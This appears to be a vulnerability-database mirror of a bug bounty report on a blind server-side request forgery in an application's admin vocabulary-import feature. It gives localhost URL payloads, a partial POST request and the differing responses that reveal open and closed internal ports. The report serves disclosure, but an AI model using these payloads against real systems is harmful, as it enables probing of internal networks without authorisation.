Lucene search

K
huntrScgajge12F5018226-0063-415D-9675-D7E30934FF78
HistoryJul 16, 2023 - 1:53 a.m.

Server Side Request Forgery (SSRF)

2023-07-1601:53:21
scgajge12
www.huntr.dev
8
blind ssrf
vocabulary screen
administrator
import
payload
request
response result

0.0005 Low

EPSS

Percentile

18.1%

Description

There is Blind SSRF on the vocabulary screen in the administrator screen.

Proof of Concept

Step 1. Log in to the administrator screen and access “Import new vocabulary” from the “vocabulary” page.
Step 2. Specify the following Payload in the “Vocabulary URL” field and check that the local environment can be accessed from the response result. (File format: JSON-LD)

Payload

Open Port

http://localhost:80

Open Port

http://localhost:443

Closed Port

http://localhost:1234

Request

POST /admin/vocabulary/import HTTP/1.1
 ...

-----------------------------28807843559236410972421406436
Content-Disposition: form-data; name="vocabulary-file[url]"

http://localhost:80
-----------------------------28807843559236410972421406436
Content-Disposition: form-data; name="vocabulary-file[format]"

jsonld
-----------------------------28807843559236410972421406436
 ...

Response Result

Open Port

Unable to load the remote document "<!DOCTYPE html  ...

Closed Port

Unable to connect to localhost:1234 (Connection refused)

PoC Video

https://drive.google.com/file/d/10SmI9dtRewubES4kRHHk2xyupG_GxLF5/view?usp=sharing

0.0005 Low

EPSS

Percentile

18.1%

Related for F5018226-0063-415D-9675-D7E30934FF78